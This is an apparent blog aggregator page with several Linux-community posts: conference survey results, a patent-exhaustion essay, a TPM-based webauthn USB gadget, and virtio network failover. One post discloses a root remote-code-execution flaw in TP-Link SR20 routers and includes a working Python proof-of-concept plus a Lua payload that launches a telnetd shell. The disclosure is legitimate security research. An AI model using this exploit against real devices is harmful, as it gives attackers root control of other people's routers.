April 10, 2019 09:37 PM

April 08, 2019

Linux Plumbers Conference: Results from the 2018 LPC survey

Thank you to everyone who participated in the survey after Linux Plumbers in 2018. We had 134 responses, which, given the total number of conference participants of around 492, has provided confidence in the feedback.

Overall: 85% of respondents were positive about the event, with only 2% actually saying they were dissatisfied. Co-locating with Kernel Summit proved popular, so we will be co-locating with Kernel Summit in 2019. Co-locating with Networking Summit was also well received, so we will be doing that again this year, too. Conference participation was up from 2017 and we sold out again this year. 98% of those that registered were able to attend.

Based on feedback from last year’s survey, we videotaped all of the sessions, and the videos are now posted. There are over 100 hours of video in our YouTube channel or you can access them by visiting the detailed schedule and clicking on the video link in the presentation materials section of any given talk or discussion. The Microconferences are recorded as one long video block, but clicking on the video link of a particular discussion topic will take you to the time index in that file where the chosen discussion begins.

Venue: 67% of survey respondents considered the number of attendees to be just right, however 25% would have liked to see more people able to attend. In general, 43% of respondents considered the venue size to be a good match, but a significant portion (45%) would have preferred it to be bigger. The room size was considered effective for participation by 95% of the respondents, however there was a clear indication in the comments that we need to figure out a better way to allocate rooms based on expected participants, as some ended up overflowing. There is some desire for additional electrical outlets to be made available, which will be looked into for the 2019 event.

Content: In terms of track feedback, Linux Plumbers Refereed track and Kernel Summit track were indicated as very relevant by almost all respondents who attended. The Networking track had fewer participants responding on the survey, but was positively reviewed as well. Hallway track continues to be regarded as very relevant, and appreciated.

Communication: This year we had a new website, and participants were able to navigate through it and find the sessions they needed. In the feedback, there were some requests to integrate scheduling app capabilities (and attendee room size); the committee will look into options for that.

Events: Craft Beer was the most popular event and had favorable feedback from respondents. There were some concerns expressed in the written feedback that we didn’t clarify there were non-alcoholic options available there, and we’ll take note to communicate this better in future. The final closing event venue was originally planned for conference attendance similar to the prior year; the 20% increase to 492 attendees impacted this event, and the comments suggest it was perceived as too crowded, with insufficient food.

There were lots of great suggestions to the “what one thing would you like to see changed” question, and the program committee has been studying them to see what is possible to implement this year. Thank you again to the participants for their input and help on making the Linux Plumbers Conference better in 2019 and the future.

April 08, 2019 03:30 PM

March 30, 2019

James Bottomley: A Roadmap for Eliminating Patents in Open Source

The realm of Software Patents is often considered to be a fairly new field which isn’t really influenced by anything else that goes on in the legal landscape. In particular, there’s a very old area of patent law called exhaustion which had, up until a few years ago, never been applied to software patents. This lack of application means that exhaustion is rarely raised as a defence against infringement and thus it is regarded as an untested strategy. Van Lindberg recently did a FOSDEM presentation containing interesting ideas about how exhaustion might apply to software patents in the light of recent court decisions. The intriguing possibility this offers us is that we may be close to an enforceable court decision (at least in the US) that would render all patents in open source owned by community members exhausted and thus unenforceable. The purpose of this blog post is to explain the current landscape and how we might be able to get the necessary missing court decisions to make this hope a reality.

What is Patent Exhaustion?

Patent law is ancient, going back to Greece in around 500BC. However, every legal system has been concerned that patent holders, having an effective monopoly with the legal right to exclude others, should not abuse that monopoly position. This led to the concept that if you used your monopoly power to profit, you should only be able to do it once for the same item, so that absolute property rights couldn’t be clouded by patents. This leads to something called the exhaustion doctrine: if Alice holds a patent on some item which she sells to Bob and Bob later sells the same item to Charlie, Alice can’t force Bob or Charlie to give her a part of their sale proceeds in exchange for her allowing Charlie to practise the patent on the item. The patent rights are said to be exhausted with the sale from Alice to Bob, so there are no patent rights left to enforce on Charlie. The exhaustion doctrine has since been expanded to any authorized transfer, even if no money changes hands (so if Alice simply gave Bob the item instead of selling it, the patent still exhausts at that transaction and Bob is still free to give or sell the item to Charlie without interference from Alice).

Of course, modern US patent rights have been around now for two centuries and in that time manufacturers have tried many ingenious schemes to get around the exhaustion doctrine profitably, all of which have so far failed in the courts, leading to quite a wealth of case law on the subject. The most interesting recent example (Lexmark v Impression) was over whether a patent holder could use their patent power to enforce any onward conditions at all, for which the US Supreme Court came to the conclusive finding: they can’t, and it went on to say that all patent rights in the item terminate in the first authorized transfer. That doesn’t mean no post-sale conditions can be imposed - they can, by contract or licence or other means - it just means post-sale conditions can’t be enforced by patent actions. This is the bind for Lexmark: their sales contracts did specify that empty cartridges couldn’t be resold, so their customers violated that contract by selling the cartridges to Impression to refill and resell. However, that contract was between Lexmark and the customer, not Lexmark and Impression, so absent patent remedies Lexmark has no contractual case against Impression, only against its own customers.

Can Exhaustion apply if Software isn’t actually sold?

The exhaustion doctrine actually has an almost identical equivalent for copyright called the First Sale doctrine. Back when software was being commercialized, no software distributor liked the idea that copyright in software exhausts after it is sold, so the idea of licensing instead of selling software was born, which is why you always get that end user licence agreement for software you think you bought. However, this makes all software (including open source) very tricky for patent exhaustion because there’s no first sale to exhaust the rights.

The idea that Exhaustion didn’t have to involve an exchange of something (so became authorized transfer instead of first sale) in US law is comparatively recent, dating to a 2013 decision LifeScan v Shasta where one point won on appeal was that giving away devices did exhaust the patent. The idea that authorized transfer could extend to software downloads really dates to Cascades v Samsung in 2014.

The bottom line is that exhaustion does apply to software and downloading is an authorized transfer within the meaning of the Exhaustion Doctrine.

The Implications of Lexmark v Impression for Open Source

The precedent for Open Source is quite clear: patents cannot be used to impose onward conditions that the copyright licence doesn’t. For instance the Open Air Interface 5G alliance public licence attempts just such a restriction in clause 3 “Grant of Patent License” where it tries to restrict the grant to being only if you use the source for “study and research”, otherwise you need an additional patent licence from OAI. Lexmark v Impression makes that clause invalid in the licence: once you obtain open source under the OAI licence, the OAI patents exhaust at that point and there are no onward patent rights left to enforce. This means that source distributed under OAI can be reused under the terms of the copyright licence (which is permissive) without any fear of patent restrictions. Now OAI can still amend its copyright licence to impose the field of use restrictions and enforce them via copyright means, it just can’t use patents to do so.

FRAND and Open Source

There have recently been several attempts to claim that FRAND patent enforcement and Open Source licensing can be compatible, or more specifically a FRAND patent pool holder like a Standards Development Organization can both produce an Open Source reference implementation and still collect patent Royalties. This looks to be wrong, however; the Supreme Court decision is clear: once a FRAND Patent pool holder distributes any code, that distribution is an authorized transfer within the meaning of the first sale doctrine and all FRAND pool patents exhaust at that point. The only way to enforce the FRAND royalty payments after this would be in the copyright licence of the code and obviously such a copyright licence, while legal, would not be remotely an Open Source licence.

Exhausting Patents By Distribution

The next question to address is whether patents could become exhausted simply because the holder distributed Open Source code in any form. As I said before, there is actually a case on point for this as well: Cascades v Samsung. In this case, Cascades tried to sue Samsung for violating a patent on the Dalvik JIT engine in AOSP. Cascades claimed they had licensed the patent to Google for a payment only for use in Google products. Samsung claimed exhaustion because Cascades had licensed the patent to Google and Samsung downloaded AOSP from Google. The court agreed with this and dismissed the infringement action. Case closed, right? Not so fast: it turns out Cascades raised a rather silly defence to Samsung’s claim of exhaustion, namely that the authorized transfer under the exhaustion doctrine didn’t happen until Samsung did the download from Google, so they were still entitled to enforce the Google products only restriction. As I said in the beginning, courts have centuries of history with manufacturers trying to get around the exhaustion doctrine, and this one crashed and burned just like all the others. However, the question remains: if Cascades had raised a better defence to the exhaustion claim, would they have prevailed?

The defence Cascades could have raised is that Samsung didn’t just download code from Google, they also copied the code they downloaded and those copies should be covered under the patent right to exclude manufacture, which didn’t exhaust with the download. To illustrate this in the Alice, Bob, Charlie chain: Alice sells an item to Bob and thus exhausts the patent so Bob can sell it on to Charlie unencumbered. However that exhaustion does not give either Bob or Charlie the right to manufacture a new copy of the item and sell it to Denise because exhaustion only applies to the same item Alice sold, not to a newly manufactured copy of that item.

The copy as new manufacture defence still seems rather vulnerable on two grounds: first, because Samsung could download any number of exhausted copies from Google, so what’s the difference between them downloading ten copies and them downloading one copy and then copying it themselves nine times? Secondly, and more importantly, Cascades already had a remedy in copyright law: their patent licence to Google could have required that the AOSP copyright licence be amended not to allow copying of the source code by non-Google entities except on payment of royalties to Cascades. The fact that Cascades did not avail themselves of this remedy at the time means they’re barred from reclaiming it now via patent action.

The bottom line is that “distribution exhausts all patents reading on the code you distribute” is a very reasonable defence to maintain in a patent infringement lawsuit, and it’s one we should be using much more often.

Exhaustion by Contribution

This is much more controversial and currently has no supporting case law. The idea is that Distribution can occur even with only incremental updates on the existing base (git pull to update code, say), so if delta updates constitute an authorized transfer under the exhaustion doctrine, then so must a patch based contribution, being a delta update from a contributor to the project, be an authorized transfer. In which case all patents which read on the project at the time of contribution must also exhaust when the contribution is made.

Even if the above doesn’t fly, it’s undeniable that most contributions today are made by cloning a git tree and republishing it plus your own updates (essentially a github fork), which makes you a bona fide distributor of the whole project because it can all be downloaded from your cloned tree. Thus I think it’s reasonable to hold that all patents owned by distributors and contributors in an open source project have exhausted in that project. In other words, all the arguments about the scope and extent of patent grants and patent capture in open source licences are entirely unnecessary.

Therefore, all active participants in an Open Source community ipso facto exhaust any patents on the community code as that code is redistributed.

Implications for Proprietary Software

Firstly, it’s important to note that the exhaustion arguments above have no impact on the patentability of software or the validity of software patents in general, just on their enforcement. Secondly, exhaustion is triggered by the unencumbered right to redistribute which is present in all Open Source licences. However, proprietary software doesn’t come with a right to redistribute in the copyright licence, meaning exhaustion likely doesn’t trigger for them. Thus the exhaustion arguments above have no real impact on the ability to enforce software patents in proprietary code except that one possible defence that could be raised is that the code practising the patent in the proprietary software was, in fact, legitimately obtained from an open source project under a permissive licence and thus the patent has exhausted. The solution, obviously, is that if you worry about enforceability of patents in proprietary software, always use a copyleft licence for your open source.

What about the Patent Troll Problem?

Trolls, by their nature, are not IP producing entities, thus they are not ecosystem participants. Therefore trolls, being outside the community, can pursue infringement cases unburdened by exhaustion problems. In theory this is partially true, but Trolls don’t produce anything, therefore they have to acquire their patents from someone who does. That means that if the producer from whom the troll acquired the patent was active in the community, the patent has still likely exhausted. Since the life of a patent is roughly 20 years and mass adoption of open source throughout the software industry is only really 10 years old, there still may exist patents owned by Trolls that came from corporations before they began to be Open Source players and thus might not be exhausted.

The hope this offers for the Troll problem is that in 10 years time, all these unexhausted patents will have expired and thanks to the onward and upward adoption of open source there really will be no place for Trolls to acquire unexhausted patents to use against the software industry, so the Troll threat is time limited.

A Call to Arms: Realising the Elimination of Patents in Open Source

Your mission, should you choose to be part of this project, is to help advance the legal doctrines on patent exhaustion. In particular, if the company you work for is sued for patent infringement in any Open Source project, even by a troll, suggest they look into asserting an exhaustion based defence. Even if your company isn’t currently under threat of litigation, simply raising awareness of the option of exhaustion can help enormously.

The first case in which an exhaustion defence could potentially be tried is this one: Sequoia Technology is asserting a patent against LVM in the Linux kernel. However, it turns out that patent 6,718,436 is actually assigned to ETRI, who merely licensed it to Sequoia for the purposes of litigation. ETRI, by the way, is a Linux Foundation member but, more importantly, in 2007 ETRI launched their own distribution of Linux called Booyo, which would appear to be evidence that their own actions as a distributor of the Linux Kernel exhausted patent 6,718,436 in Linux long before they ever licensed it to Sequoia.

If we get this right, in 10 years the Patent threat in Open Source could be history, which would be a nice little legacy to leave our children.

March 30, 2019 09:32 PM

March 29, 2019

Pete Zaitcev: Swift(stack) bragging today

On their official blog:

Over the last several months, SwiftStack has been busy helping two large autonomous vehicle customers. These data pipelines are distributed across edge (vehicle sensors) to core (data center) to cloud/multi-cloud locations, and are challenged with ingest, labeling, training, inferencing, and retaining data at scale. [...] one deployment is handling more than a petabyte of data per week, with four thousand GPU cores from NVIDIA DGX-1 servers fed with 100 GB/s of throughput from SwiftStack cluster.

I suspect the task-queue expirer could be helpful at this. Although, if you're uploading 1 PB per week, it takes about a year to fill out a cluster as big as Turkcell's.

Apparently the actual storage is provided by Cisco UCS S3260. Some of our customers use Cisco UCS to run Swift too. I always thought of Cisco as a networking company, but it's different nowadays.

March 29, 2019 03:54 AM

Daniel Vetter: X.org Elections: freedesktop.org Merger - Vote Now!

Aside from the regular board elections we also have some bylaw changes to vote on. As usual with bylaw changes, we need a supermajority of all members to agree - if you don’t vote you essentially reject it, but the board has no way of knowing.

Please see the detailed changes of the bylaws, make up your mind, and go voting on the shiny new members page.

March 29, 2019 12:00 AM

March 28, 2019

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:

int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstate();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:

Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
import sys
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = binascii.hexlify(response)
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


March 28, 2019 10:18 PM

March 23, 2019

James Bottomley: Webauthn in Linux with a TPM via the HID gadget

Account security on the modern web is a bit of a nightmare. Everyone understands the need for strong passwords which are different for each account, but managing them is problematic because the human mind just can’t remember hundreds of complete gibberish words, so everyone uses a password manager (which, let’s admit it, for a lot of people means writing them down). A solution to this problem has long been something called two factor authentication (2FA), which authenticates you by something you know (like a password) and something you possess (like a TPM or a USB token). The problem has always been that you ideally need a different 2FA for each website, so that a compromise of one website doesn’t lead to the compromise of all your accounts.

Enter webauthn. This is designed as a 2FA protocol that uses public key cryptography instead of shared secrets and also uses a different public/private key pair for each website. Thus aspiring to be a passwordless secure scalable 2FA system for the web. However, the webauthn standard only specifies how the protocol works when the browser communicates with the remote website, there’s a different standard called FIDO or U2F that specifies how the browser communicates with the second factor (called an authenticator in FIDO speak) and how that second factor works.

It turns out that the FIDO standards do specify a TPM as one possible backend, so what, you might ask does this have to do with the Linux Gadget subsystem? The answer, it turns out, is that although the standards do recommend a TPM as the second factor, they don’t specify how to connect to one. The only connection protocols in the Client To Authenticator Protocol (CTAP) specifications are USB, BLE and NFC. And, in fact, the only one that’s really widely implemented in browsers is USB, so if you want to connect your laptop’s TPM to a browser it’s going to have to go over USB meaning you need a Linux USB gadget. Conspiracy theorists will obviously notice that if the main current connector is USB and FIDO requires new USB tokens because it’s a new standard then webauthn is a boon to token manufacturers.

How does Webauthn Work?

The protocol comes in two flavours, version 1 and version 2. Version 1 is fixed cryptography and version 2 is agile cryptography. However, version 1 is simpler, so that’s the one I’ll explain.

Webauthn essentially consists of two phases: a registration phase where the authenticator is tied to the account, which often happens when the remote account is created, and authentication where the authenticator is used to log in again to the website after registration. Obviously accounts often outlive the second factor, especially if it’s tied to a machine like the TPM, so the standard contemplates a single account having multiple registered authenticators.

The registration request consists of a random challenge supplied by the remote website to prevent replay and an application id which is constructed by the browser from the website supplied ID and the web origin of the site. The design is that the application ID should be unique for each remote account and not subject to being faked by the remote site to trick you into giving up some other application’s credentials.

The authenticator’s response consists of a unique public key, an opaque key handle, an attestation X.509 certificate containing a public key, and a signature (using the private key of the certificate) over the challenge, the application ID, the public key and the key handle. The remote website can verify this signature against the certificate to verify registration. Additionally, Google recommends that the website also verify the attestation certificate against a list of known device master certificates to prove it is talking to a genuine U2F authenticator. Since no-one is currently maintaining a database of “genuine” second factor master certificates, this last step mostly isn’t done today.

In version 1, the only key scheme allowed is Elliptic Curve over the NIST P-256 curve. This means that the public key is always 65 bytes long and an encrypted (or wrapped) form of the private key can be stashed inside the opaque key handle, which may be a maximum of 255 bytes. Since the key handle must be presented for each authentication attempt, it relieves the second factor from having to remember an ever increasing list of public/private key pairs, because all it needs to do is unwrap the private key from the opaque handle, perform the signature, and then forget the unwrapped private key. Note that this means that, per registered authenticator, the remote website must store the public key and the key handle for each user account, about 300 bytes extra, but that’s peanuts compared to the amount of information remote websites usually store per registered account.

To perform an authentication, the remote website presents a unique challenge, the raw ID from which the browser should construct the same application ID, and the key handle. Ideally the authenticator should verify that the application ID matches the one used for registration (so it should be part of the wrapped key handle) and then perform a signature over the application ID, the challenge, and a unique monotonically increasing counter number which is sent back in the response. To validly authenticate, the remote website verifies the signature is genuine and that the count has increased since the last authentication (so it has to store the per-authenticator 4 byte count as well). Any increase is fine, so each second factor only needs to maintain a single monotonically increasing counter to use for every registered site.
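
For concreteness, the data covered by the version 1 authentication signature is laid out as follows (field layout from the FIDO U2F raw message format; the struct name and comments are mine):

#include <stdint.h>

/* Byte layout signed by the authenticator during U2F v1 authentication */
struct u2f_auth_signed_data {
	uint8_t  app_param[32];   /* SHA-256 of the application ID */
	uint8_t  user_presence;   /* 1 if the user confirmed presence */
	uint32_t counter;         /* big-endian monotonic counter */
	uint8_t  chal_param[32];  /* SHA-256 of the client data (challenge) */
} __attribute__((packed));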

Problems with Webauthn and the TPM

The primary problem is the attestation certificate, which is actually an issue for the whole protocol. TPMs are actually designed to do attestation correctly, which means providing proof of being a genuine TPM without compromising the user’s privacy. The way they do this is via a somewhat complex attestation protocol involving a privacy CA. The problem they’re seeking to avoid is that if you present the same certificate every time you use the device for registration you can be tracked via that certificate and your privacy is compromised. The way the TPM gets around this is that you can use a privacy CA to produce an arbitrary number of different certificates for the same TPM and you could present a new one every time, thus leaving nothing to be tracked by.

The ability to track users by certificate has been a criticism levelled at FIDO and the best the alliance can come up with is the idea that perhaps you batch the attestation certificates, so the same certificate is used in hundreds of new keys.

The problem for TPMs though is that until FIDO devices use proper privacy CA based attestation, the best you can do is generate a separate self signed attestation certificate. The reason is that the TPM does contain its own certificate, but it’s encryption only, not signing because of the way the TPM privacy CA based attestation works. Thus, even if you were willing to give up your privacy you can’t use the TPM EK certificate as the FIDO attestation certificate. Plus, if Google carries out its threat to verify attestation certificates, this scheme is no longer going to work.

Aside about Browsers and CTAP

The crypto aware among you will recognise that there is already a library based standard that can be used to talk to a variety of USB tokens and even the TPM called PKCS#11. Mozilla Firefox, for instance, already supports using this as I demonstrated in a previous blog post. One might think, based on what I said about the one token per key problem in the introduction, that PKCS#11 can’t support the new key wrapping based aspect of FIDO but, in fact, it can via the C_WrapKey/C_UnwrapKey API. The only thing PKCS#11 can’t do is the new monotonic counter.

Even if PKCS#11 can’t perform all the necessary functions, what about a new or extended library based protocol? This is a good question to which I’ve been unable to get a satisfactory answer. Certainly doing CTAP correctly requires that your browser be able to speak directly to the USB, Bluetooth and NFC subsystems. Perhaps not too hard for a single platform browser like Internet Explorer, but fraught with platform complexity for generic browsers like Firefox, where the only solution is to have a rust based accessor for every supported platform.

Certainly the lack of a library interface is where the TPM issues come from, because without one we have to plug the TPM based FIDO layer into the browser over an existing CTAP protocol it supports, i.e. USB. Fortunately Linux has the USB Gadget subsystem, which fits the bill precisely.

Building Synthetic HID Devices with USB Gadget

Before you try this at home, I should point out that the Linux HID Gadget has a longstanding bug that will cause your machine to hang unless you have this patch applied. You have been warned!

The HID subsystem is for driving Human Interface Devices, meaning keyboards and mice. However, it has a simple packet (called a report in USB speak) based protocol which is easy for most things to use. In order to facilitate this, Linux actually provides hidraw devices which allow you to send and receive these reports using read and write system calls (which, in fact, is how Firefox on Linux speaks CTAP). What the hid gadget does when set up is provide all the static emulation of HID device protocols (like discovery pages) while allowing you to send and receive the hidraw packets over the /dev/hidgX device tap, also via read and write (essentially operating like a tty/pty pair). To get the whole thing running, the final piece of the puzzle is that the browser (most likely running as you) needs to be able to speak to the hidraw device, so you need a udev rule to make it accessible, because by default they’re 0600. Since the same goes for every other USB security token, you’ll find the template in the same rpm that installs the PKCS#11 library for the token.

The way CTAP works is that every transaction is split into 64 byte reports and sent over the hidraw interface. All you need to do to get this set up is initialise a report descriptor for this type of device. Since that is somewhat cumbersome to do, I've created this script to do it (run it as root). Once you have this, the hidraw and hidg devices will appear (make them both user accessible with chmod 666) and then all you need is a programme to drive the hidg device and you're done.
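
For orientation, here is a compressed, hedged sketch of the configfs steps such a script performs; the vendor/product IDs are placeholders and the FIDO report descriptor bytes are elided:

modprobe libcomposite                         # configfs gadget support
modprobe dummy_hcd                            # assumption: loops the gadget back to the local host
cd /sys/kernel/config/usb_gadget
mkdir fido && cd fido
echo 0x1d6b > idVendor                        # placeholder IDs
echo 0x0104 > idProduct
mkdir functions/hid.usb0
echo 64 > functions/hid.usb0/report_length    # CTAP reports are 64 bytes
# cat fido-report-descriptor.bin > functions/hid.usb0/report_desc
mkdir configs/c.1
ln -s functions/hid.usb0 configs/c.1/
ls /sys/class/udc | head -1 > UDC             # bind to the first available UDC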

A TPM Based Hid Gadget Driver

Note: this section is written describing TPM 2.0.

The first thing we need out of the TPM is a monotonic counter; fortunately, all TPMs have NV counter indexes which can be created (all TPM counters are 8 bytes, whereas the CTAP protocol requires 4, but we simply chop off the top 4 bytes). By convention I create the counter at NV index 01000101. Once created, this counter will be persistent and monotonic for the lifetime of the TPM.
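
If you want to experiment with the counter outside the driver, it can be created from the command line; a hedged sketch using tpm2-tools (4.x flag syntax, which varies between versions):

tpm2_nvdefine 0x01000101 -C o -a "ownerread|ownerwrite|authread|authwrite|nt=1"   # nt=1: counter type
tpm2_nvincrement -C o 0x01000101     # a fresh counter must be incremented before its first read
tpm2_nvread -C o 0x01000101 | xxd    # 8 bytes; the CTAP layer keeps only the low 4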

The next thing you need is an attestation certificate and key. These must be NIST P-256 based, but it's easy to get openssl to create them:

openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:prime256v1 -pkeyopt ec_param_enc:named_curve -out reg_key.key

openssl req -new -x509 -subj '/CN=My Fido Token/' -key reg_key.key -out reg_key.der -outform DER

This creates a self signed certificate, but you could also create a certificate chain this way.

Finally, we need the TPM to generate one NIST P-256 key pair per registration. Here we use the TPM2_Create() call, which gets the TPM to create a random asymmetric key pair and return the public and wrapped private pieces. We can simply bundle these up and return them as the key handle (fortunately, what the TPM spits back for a NIST P-256 key is about 190 bytes when properly marshalled). When the remote end requests an authentication, we extract the TPM key from the key handle, use TPM2_Load() to place it in the TPM, sign the hash, and then unload the key from the TPM. Putting this all together, this project (which is highly experimental) provides the script to create the devices and a hidg driver that interfaces to the TPM. All you need to do is run it as

hidgd /dev/hidg0 reg_key.der reg_key.key

And you’re good to go. If you want to test it there are plenty of public domain webauthn test sites, webauthn.org and webauthn.io2 are two I’ve tested as working.

TODO Items

The webauthn standard specifies the USB authenticator should ask for permission before performing either registration or authentication. Currently the TPM hid gadget doesn’t have any external verification, but in future I’ll add a configurable pinentry to add confirmation and possibly also a single password for verification.

The current code also does nothing to verify the application ID on a per-authorization basis. This is a security problem, because you are currently vulnerable to being spoofed by malicious websites, which could hand you a snooped key handle and then use the signature to fake your login to a different site. To avoid this, I'm planning to use the policy area of the TPM key to hold the application ID. This should work because the generated keys have no authorization, either policy or password, so the policy area is effectively redundant. It is in the unwrapped public key, but if any part of the public key is tampered with, the TPM will detect this via a hash in the wrapped private part and give a binding error on load.

The current code really only does version 1 of the FIDO protocol. Ideally it needs upgrading to version 2. However, there’s not really much point because for all the crypto agility, most TPMs on the market today can only do NIST P-256 curves, so you wouldn’t gain that much.

Conclusions

Using this scheme you’re ready to play with FIDO/U2F as long as you have a laptop with a functional TPM 2.0 and a working USB gadget subsystem. If you want to play, please remember to make sure you have the gadget patch applied.

March 23, 2019 09:58 PM

March 17, 2019

Michael S. Tsirkin:

Virtio Network Device Failover


Support for Virtio Network Device Failover, which was merged for Linux 4.17, presents an interesting study in interface design, both for operating systems and hypervisors. Read on for an article examining the problem domain and the solution space, and describing the current status of the implementation.


PT versus PV NIC

Imagine a Virtual Machine running on a hypervisor on a host computer. The hypervisor has access to a network to which the host is attached, but how should the guest gain this access? The answer could depend on the type of the network and on the network interface on the host. For the sake of this article we focus on Ethernet networks and NICs. In this setup a popular solution extends (bridges) the Ethernet network into the guest by exposing a virtual Ethernet device as part of the VM.

In most setups a single host NIC would be shared between VMs. Two popular configurations are shown below:

[Figure: VM network configurations]

In the first diagram (on the left) the NIC exposes Virtual Function (VF) interfaces which the hypervisor "passes through" - makes accessible to the guests. Using such Passthrough (PT) interfaces, packets can pass between the guest and the NIC directly. For PCI devices, device memory can actually be mapped into the address space of the virtual machine in such a way that the guest can access the device without invoking the hypervisor. In the setup on the right, packets are passed between the guest and the NIC by the hypervisor. The hypervisor interface used by the guest for this purpose would commonly be a PV - para-virtual (i.e. designed for the hypervisor) - NIC. One example would be the Virtio network device, used for example with the KVM hypervisor. By comparison, Microsoft HyperV guests use the netvsc device with its PV NICs.

Since the underlying packets are still handled by the physical NIC in both cases, it would be unusual for the second (PV) setup to outperform the first (PT) one. Besides removing some of the hypervisor overhead, passthrough allows the driver within the guest to be precisely tuned to the physical device.

However, the PV NIC setup obviously offers more flexibility - for example, the hypervisor can implement an arbitrary filtering policy for the networking packets. By comparison, with PT NICs we are limited to the features presented by the hardware NICs, which are often more limited: some of them only have the simplest filtering capabilities. As an example of a simple and effective filtering/security measure, a guest would often be prevented from modifying the MAC address of its devices, limiting the guest's access to the host's network.

But even apart from the limitations of specific hardware, a standardized interface independent of the physical NIC makes the system easier to manage: use of a standard driver within the guest, as well as a well known state of the device, enables features such as live migration of guests between hypervisors: guests can often be moved with negligible network downtime.

The same cannot generally be said of the passthrough setup. For example, one of the issues encountered with it is that even a small difference between hypervisor hosts in their physical hardware would require expensive reconfiguration when switching hypervisors.

Can something be done about performance, to get the speed benefits of pass-through without giving up live migration and the other advantages of standardized PV NIC setups? One approach could be designing a pass-through NIC around a standard paravirtualized interface. This is the approach taken by the Virtio Data Path Accelerator devices. In the absence of such an accelerator, Virtual Network Device Failover presents another possible approach.

Network device Failover basics

Conceptually, the idea behind Virtual Network Device Failover is simple: assume that a standard PV interface only brings benefits part of the time. The system would change its configuration accordingly - e.g. when migration is required use the PV interface, when it’s not - use a PT device.

When possible, the hypervisor will pass through the NIC to the guest as a "primary" device. To reduce downtime, a "standby" PV device is kept around at all times. When PV features are not required, the hypervisor can give the guest access to the primary PT device. At other times the standby PV interface is used.

Accordingly, the guest is required to switch over between the primary and standby interfaces depending on availability of the primary interface.

[Figure: network device failover basics]

An astute reader might notice that the above switching sounds a bit like the active-backup configuration of the bond and team network drivers in Linux. That is true - in fact in the past one of these drivers has often been used to implement network device failover. Let’s take a quick look at how active-backup can be used for network device failover.

Network Device Failover using active-backup

This text will use the term bond when meaning the network device created by either the bond or the team driver: the differences between these two mostly have to do with how devices are created, configured and destroyed, and will not be covered here.

